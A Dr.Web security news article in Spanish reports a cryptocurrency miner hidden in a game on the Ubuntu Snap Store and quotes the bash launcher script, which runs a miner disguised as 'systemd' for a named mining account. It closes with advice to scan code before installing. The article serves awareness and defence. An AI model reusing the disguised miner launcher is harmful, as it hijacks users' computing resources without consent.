¡Vd. usa un navegador obsoleto!

Es posible que la página no se visualice correctamente.

Aguafiestas

Незваные гости

Otras ediciones de este tema (62)
  • añadir a favoritos
    Añadir a marcadores

Mi primer Ferrari

Consultas: 341 Comentarios: 2 Ranking: 7

Los encoders para Linux son una cosa muy frecuente, nuestra empresa detectó el primero. Los miners para Linux también son conocidos – los ordinarios, no nocivos. Pero sería raro si con tanta popularidad los malintencionados no intentaran ganar un poco de dinero a través de los usuarios ordinarios de este sistema operativo.

En la distribución popular de Ubuntu hace poco apareció un nuevo formato de aplicaciones – un paquete snap. Por lo tanto, apareció una tienda oficial, similar a Windows Store. Todo sirvió para facilitar el trabajo del usuario con el sistema. Pero nadie iba a escanear las aplicaciones que se subían a la tienda.

Un usuario prudente detectó en el código del juego un miner de criptodivisa y un script que firmaba automáticamente el inicio de este miner.

El código abierto es muy cómodo, enseguida se puede ver todos los planes nocivos de las aplicaciones que son más o menos así:


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

Pero por alguna razón nadie lo notaba. Es más, los miners y scripts aparecieron también en otras aplicaciones del mismo autor. El código nocivo obtenía la criptodivisa para un usuario con la dirección que se traduce como «mi primer Ferrari». No hay contador de descargas o instalaciones en Ubuntu Snap Store, por lo tanto, no podemos saber si el creador de virus ha podido ahorrar dinero para comprar el coche de su sueño.

#Linux #juegos #mining

Dr.Web recomienda

  1. Al usar Linux, tenga prudencia. Si cada uno puede escanear los códigos fuente del software con el código abierto, esto no significa que cada uno escanea algo. Frecuentemente en la práctica uno piensa que lo hará otra persona, y al mismo tiempo el código nocivo o la vulnerabilidad peligrosa se difunde e infecta muchas estaciones de trabajo y servidores.
  2. Escanee el código de cada programa que tiene previsto descargar e instalar o use el antivirus. No espere que lo haga otra persona.

Reciba los puntos Dr.Web por valorar la edición (1 voto = 1 punto Dr.Web)

Inicie sesión y obtenga 10 puntos Dr.Web por publicar un enlace a la edición en una red social.

[Twitter]

Por causa de restricciones técnicas de Vkontakye y Facebook, lamentamos no poder ofrecerle los puntos Dr.Web. Pero Vd. puede compartir un enlace a esta edición sin obtener los puntos Dr.Web. Es decir, gratis.

Nos importa su opinión

10 puntos Dr.Web por un comentario el día de emisión de la edición, o 1 punto Dr.Web cualquier otro día. Los comentarios se publican automáticamente y se moderan posteriormente. Normas de comentar noticias Doctor Web.

Para redactar un comentario, debe iniciar sesión para entrar en su cuenta del sitio web Doctor Web. - Si aún no tiene la cuenta, puede crearla.

Comentarios de usuarios